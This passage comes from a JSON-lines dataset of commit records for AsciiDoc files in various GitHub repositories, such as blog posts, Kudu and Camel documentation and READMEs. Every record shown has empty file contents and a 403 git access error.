'2012-12-1-Frisbeens-historie.adoc'","repos":"discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk","old_file":"2012-12-1-Frisbeens-historie.adoc","new_file":"2012-12-1-Frisbeens-historie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/discimport\/blog.discimport.dk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7603e6e444e16e564c540ee0a6dc36280517d55c","subject":"Update 2018-04-29.adoc","message":"Update 2018-04-29.adoc","repos":"hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io","old_file":"_posts\/2018-04-29.adoc","new_file":"_posts\/2018-04-29.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hytgbn\/hytgbn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e133978ec079cbc801fabef752a42fe538b3132b","subject":"Update 2015-06-26-Hello-World.adoc","message":"Update 2015-06-26-Hello-World.adoc","repos":"gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io","old_file":"_posts\/2015-06-26-Hello-World.adoc","new_file":"_posts\/2015-06-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdbremer\/gerdbremer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d847df73751df93e18d1fc3951173b738d22ad10","subject":"Update 2016-07-15-Hello-world.adoc","message":"Update 2016-07-15-Hello-world.adoc","repos":"minditech\/minditech.github.io,minditech\/minditech.github.io,minditech\/minditech.github.io,minditech\/minditech.github.io","old_file":"_posts\/2016-07-15-Hello-world.adoc","new_file":"_posts\/2016-07-15-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minditech\/minditech.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32b8f92c4901484cacf9645549ab2b38ea5e8f9f","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"346b6447fed0726045d80454b1a7c159be45175b","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/19\/deref.adoc","new_file":"content\/news\/2021\/11\/19\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"84898b72962b5cee14010a53d08ecf04af223073","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d7271183138caa7c138e467af6005d37d806d85","subject":"Create CHANGELOG.adoc","message":"Create CHANGELOG.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"370343ecf0bb2fccb33a4f1ddb41ec650118f1a9","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d64c8a6809cf26d6de51f12355cc3373981fa81c","subject":"Update 2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","message":"Update 2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","new_file":"_posts\/2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8637632c31a126f97ad8513e237a25c32719df7d","subject":":memo: mkdocs-material","message":":memo: mkdocs-material\n","repos":"syon\/refills","old_file":"src\/refills\/github-pages\/mkdocs-material.adoc","new_file":"src\/refills\/github-pages\/mkdocs-material.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69260250b46f6d53fcc1b23e55270bd0d082925d","subject":"Update 2015-05-12-First-Post.adoc","message":"Update 2015-05-12-First-Post.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2015-05-12-First-Post.adoc","new_file":"_posts\/2015-05-12-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mubix\/blog.room362.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c9b1779df13c28c8165ef99a13a9adba438194c","subject":"Update 2016-08-08-2016-08-07.adoc","message":"Update 2016-08-08-2016-08-07.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-08-2016-08-07.adoc","new_file":"_posts\/2016-08-08-2016-08-07.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"017e5bf2152d1101512bcbac8690e14409f0658c","subject":"Update 2017-01-01-Blog-Title.adoc","message":"Update 2017-01-01-Blog-Title.adoc","repos":"mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io","old_file":"_posts\/2017-01-01-Blog-Title.adoc","new_file":"_posts\/2017-01-01-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mmhchan\/mmhchan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cb5342146ba570308184514c36a8aa6d7ebc246","subject":"Update 2018-04-15-Ego-search.adoc","message":"Update 2018-04-15-Ego-search.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-15-Ego-search.adoc","new_file":"_posts\/2018-04-15-Ego-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f12fc4e14e67f54bf2710dc01a8dd9101920d538","subject":"y2b create post Google+ Invites for Subscribers!","message":"y2b create post Google+ Invites for Subscribers!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-12-Google-Invites-for-Subscribers.adoc","new_file":"_posts\/2011-07-12-Google-Invites-for-Subscribers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e09112a6b837e3e114f636ed91f06de1e8f7b049","subject":"Update 2014-12-30-Semantic-versioning.adoc","message":"Update 2014-12-30-Semantic-versioning.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-12-30-Semantic-versioning.adoc","new_file":"_posts\/2014-12-30-Semantic-versioning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"031b05b770e71ba3655665bf920ae31ab2c7b956","subject":"Removed embedded control char from docs","message":"Removed embedded control char from docs\n","repos":"takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d45eb27006756780d38ed0e019842c4223f2dffd","subject":"docs: split disk failure from disk config changes","message":"docs: split disk failure from disk config changes\n\nThe administration notes commented on Kudu's handling of disk failures\nwith instructions to rebuild a tserver with a new directory\nconfiguration. While related, these two are separate and should be\ndocumented as such.\n\nChange-Id: I732286d0f56f7a15705ad544fc7dfc426287714e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7984\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0744a6945b6d280a9e156f0f5d89e45fce17bc9","subject":"Update 2014-05-16-Commits-safety-first.adoc","message":"Update 2014-05-16-Commits-safety-first.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-05-16-Commits-safety-first.adoc","new_file":"_posts\/2014-05-16-Commits-safety-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857f278a75aeb0f2547f73dcb7ddc425c31aea1b","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb1a19caab857a38edaf4ffa068e34e28f506855","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f0b262ddf07aa6784a4d9f23394e785fc4f9e9f","subject":"Update 2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","message":"Update 2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","new_file":"_posts\/2017-01-10-Easy-Infrastructure-Testing-with-GOSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ecf307280ea81825c04732183ef6c1f0a2bd5fa","subject":"Update 2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","message":"Update 2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","repos":"manikmagar\/manikmagar.github.io,manikmagar\/manikmagar.github.io","old_file":"_posts\/2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","new_file":"_posts\/2017-03-09-How-to-check-daylight-savings-in-Mule.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manikmagar\/manikmagar.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbffbe4d1fa3ebffeb7839996a725599296a9418","subject":"Create do-contribution-file-fil.adoc","message":"Create do-contribution-file-fil.adoc\n\nFilipino translation for do-contribution-file.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-contribution-file-fil.adoc","new_file":"src\/do\/do-contribution-file-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1064e0d3b44e9dca9471a08df4bfaedfadee0757","subject":"Add release notes for Camel 2.24.0","message":"Add release notes for Camel 2.24.0\n","repos":"cunningt\/camel,apache\/camel,tdiesler\/camel,zregvart\/camel,alvinkwekel\/camel,CodeSmell\/camel,tadayosi\/camel,adessaigne\/camel,adessaigne\/camel,Fabryprog\/camel,pmoerenhout\/camel,objectiser\/camel,Fabryprog\/camel,nicolaferraro\/camel,DariusX\/camel,christophd\/camel,mcollovati\/camel,CodeSmell\/camel,gnodet\/camel,DariusX\/camel,objectiser\/camel,mcollovati\/camel,tadayosi\/camel,objectiser\/camel,mcollovati\/camel,ullgren\/camel,ullgren\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,alvinkwekel\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,gnodet\/camel,davidkarlsen\/camel,CodeSmell\/camel,adessaigne\/camel,nikhilvibhav\/camel,cunningt\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,zregvart\/camel,ullgren\/camel,DariusX\/camel,DariusX\/camel,adessaigne\/camel,pax95\/camel,zregvart\/camel,christophd\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,alvinkwekel\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,apache\/camel,adessaigne\/camel,tadayosi\/camel,davidkarlsen\/camel,pax95\/camel,tadayosi\/camel,CodeSmell\/camel,ullgren\/camel,davidkarlsen\/camel,tdiesler\/camel,Fabryprog\/camel,tdiesler\/camel,cunningt\/camel,apache\/camel,apache\/camel,mcollovati\/camel,pax95\/camel,zregvart\/camel,pax95\/camel,cunningt\/camel,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,pax95\/camel,Fabryprog\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,cunningt\/camel,tadayosi\/camel,objectiser\/camel,pmoerenhout\/camel,tdiesler\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2240-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2240-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59db0e0f2816299d4b61b1b6cb0eecca0452acb7","subject":"KUDU-1333. Add more packages to the RHEL installation documentation","message":"KUDU-1333. Add more packages to the RHEL installation documentation\n\nAdd missing packages to the initial yum install command for RHEL.\n\nChange-Id: Iae500ee037e3d1f2e73caf91485baf5ba3c54c36\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2179\nTested-by: Kudu Jenkins\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\n","repos":"InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4b77a2543fb1eced94eced10f665420ba5430b1","subject":"Add generated restapi docs (#1867)","message":"Add generated restapi docs (#1867)\n\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/common\/restapi-reference.adoc","new_file":"documentation\/common\/restapi-reference.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d5aaa2d3a79ef7ed381b7ee50676f15a5336f45","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"333aace58edba247cec1db3fb6136977a834f0c4","subject":"Deleted 2016-08-27.adoc","message":"Deleted 2016-08-27.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"2016-08-27.adoc","new_file":"2016-08-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9274d8ca38eb1ced1a77f29bdc4670e98468dba1","subject":"Added compiler directory","message":"Added compiler directory\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"036572f44b77cd44092c8639ed6093671ce095de","subject":"Update docs for new app path and clj instructions (#224)","message":"Update docs for new app path and clj instructions (#224)\n\n","repos":"delitescere\/yada,delitescere\/yada,juxt\/yada,juxt\/yada,juxt\/yada,delitescere\/yada","old_file":"doc\/getting-started.adoc","new_file":"doc\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/yada.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6313b1dd3fa5af87a7121dadf7c1c73df1eaf135","subject":"Updated Linux OS distributions section, added change log","message":"Updated Linux OS distributions section, added change log\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d1cd1674e8dd8ef3f9bc2b5d3e86d95a3dbceb0d","subject":"Fix README links","message":"Fix README links\n\n[ci-skip]\n","repos":"K2InformaticsGmbH\/ranch,layerhq\/ranch,ninenines\/ranch","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ninenines\/ranch.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"a47b3ecf9ec1257506f6aa239c00ff8735030994","subject":"Update 2016-03-01-go-bean-Design.adoc","message":"Update 2016-03-01-go-bean-Design.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-03-01-go-bean-Design.adoc","new_file":"_posts\/2016-03-01-go-bean-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6c1b15330005934eeceec9453293aced33d9ff2","subject":"Update 2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","message":"Update 2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","new_file":"_posts\/2015-11-14-Paralelizar-procesos-desde-la-shell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"073aa067d0427283b1a925572d58f40bb0c959ab","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"285e1d78bc034c7093a09d6277ed750b302f45de","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77f2dcec7b1efac31548197677603a26ec1ff6fb","subject":"Update Links to new Job-Room","message":"Update Links to new Job-Room","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37d9ee8b6ea1240a1455b4c6fc646d9ead98d449","subject":"Update 2015-07-21-Liebes-Tagebuch.adoc","message":"Update 2015-07-21-Liebes-Tagebuch.adoc","repos":"nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io,nobodysplace\/nobodysplace.github.io","old_file":"_posts\/2015-07-21-Liebes-Tagebuch.adoc","new_file":"_posts\/2015-07-21-Liebes-Tagebuch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nobodysplace\/nobodysplace.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"512812928cd8271f74b0d4c8c643208061b0aab5","subject":"Renamed '_posts\/2018-06-01-Your-Blog-title.adoc' to '_posts\/2019-01-31-Your-Blog-title.adoc'","message":"Renamed '_posts\/2018-06-01-Your-Blog-title.adoc' to '_posts\/2019-01-31-Your-Blog-title.adoc'","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d4afde52303c27867f349af4c93925f7af1c288","subject":"#577 doc","message":"#577 doc\n","repos":"uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3d87071de8b8955a476a7f407bd1cb2ec5e3279e","subject":"Add documentation for legacy secondaries","message":"Add documentation for legacy 